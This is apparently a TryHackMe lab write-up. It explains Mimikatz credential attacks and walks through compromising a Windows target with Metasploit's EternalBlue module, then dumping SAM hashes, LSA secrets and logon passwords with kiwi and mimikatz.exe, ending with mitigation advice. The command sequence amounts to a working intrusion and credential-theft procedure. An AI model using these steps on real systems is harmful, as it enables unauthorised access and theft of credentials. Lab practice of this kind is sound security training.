Credit : Tryhackme

Dumping Hashes with Mimikatz:

Mimikatz is a well-liked post-exploitation tool that hackers use to steal crucial authentication credentials stored in memory, particularly for Windows systems. Attackers can use this tool by Benjamin Delpy to retrieve plaintext passwords, hashes, and other credentials from memory to gain elevated access and move laterally within a network.

I uploaded a video on my YouTube channel demonstrating how to perform those steps.

How Mimikatz works:

1. Pass-the-Ticket Attacks:

• Mimikatz can extract Kerberos tickets from memory. Kerberos is the default authentication protocol used in Windows environments. By stealing these tickets, an attacker can impersonate a user and gain unauthorised access.

1. Pass-the-Hash Attacks:

• It can extract password hashes stored in memory. Instead of stealing plaintext passwords, Mimikatz can.
• Use these password hashes directly to authenticate and escalate privileges without needing the password.

2. Pass-the-Certificate Attacks:

• Mimikatz can also target authentication certificates stored in the Windows Credential Manager.

3. Golden Ticket Attacks:

• Mimikatz allows the creation of “Golden Tickets,” which are forged Kerberos tickets. These tickets can provide long-term and persistent access to a network.

4. Silver Ticket Attacks:

• Similar to golden tickets, silver tickets are forged tickets that allow an attacker to access specific services within a network.

5. Credential Dumping:

• Mimikatz has various modules that dump different credentials, including plaintext passwords, NTLM hashes, and Kerberos tickets.

It’s important to note that Mimikatz is a tool that has legitimate uses, such as by security professionals for testing and enhancing security. However, it has gained notoriety as a potential weapon in the hands of malicious actors due to its ability to exploit vulnerabilities in the Windows authentication system. Organizations use various security measures, like endpoint protection and detection systems, to defend against Mimikatz and similar tools.

1. Performed nmap with the target ip and service version detection

performed nmap with the target IP and checked the service version

Once we get the service version, it's time to run msfconsole.

Service postgresql start && msfconsole

Search bedblue

Type 1 ( default payload will be established)

Show options

We need to configure target ip

Set rhost “target IP.”

Exploit

meterpreter session has started

After the meterpreter session has been established, we can try to get some information about the system.

Type sysinfo

1. Getuid and also type Pgrep lsass and after that, Migrate 788

1. Lets start with kiwi
2. Load kiwi

1. Open up the help menu
2. Creds_all

1. Lsa_dump_sam ( that is going to dump all the ntlm hashes for user accounts in the system)

1. Dump lsa_dump_secret

Cd C:\\

lets create the temp folder and upload mimikatz.exe to that folder

Mkdir Temp

Cd Temp

Upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe

open the Shell session. type shell

Dir

.\mimikatz.exe

Check privileges

Type privilege: debug.

privilege::debugrequests the debug privilege (SeDebugPrivilege).It is required to debug and adjust the memory of a process owned by another account.User Right: Debug Programme

if we want to dump the content of Sam database,

lasdump::sam

lsadump::samdumps the local Security Account Manager (SAM) NT hashes (cf. SAM secrets dump). It can operate directly on the target system or offline with registry hives backups (for SAM and SYSTEM). It has the following command-line arguments:

Which will provide with much more information, such as syskey, Samkey, and NTLM hash

Lsadump::secrets

lsadump::secretscan be used to dump LSA secrets from the registries. It retrieves the SysKey to decrypt Secrets entries.

Whenever the user logs in to the system, if the system is configured to store a password in memory in clear text, Mimikatz can show this password.

Sekurlsa::logonpasswords

Mitigation

Organisations should adopt a multi-layered security approach to mitigate the risks associated with Mimikatz and similar credential-dumping tools. To do this, robust endpoint protection solutions with up-to-date antivirus and anti-malware tools must be used, along with features like Credential Guard on Windows systems, the least privilege principle must be followed to limit access, and multi-factor authentication must be used. Regularly patching operating systems and software, implementing network segmentation, and establishing comprehensive monitoring and logging practises are essential. User education on phishing threats, strong password practises, and reporting suspicious activities is crucial. Additionally, disabling unnecessary services and protocols and having a well-defined incident response plan contribute to a holistic strategy for mitigating the risks posed by tools like Mimikatz.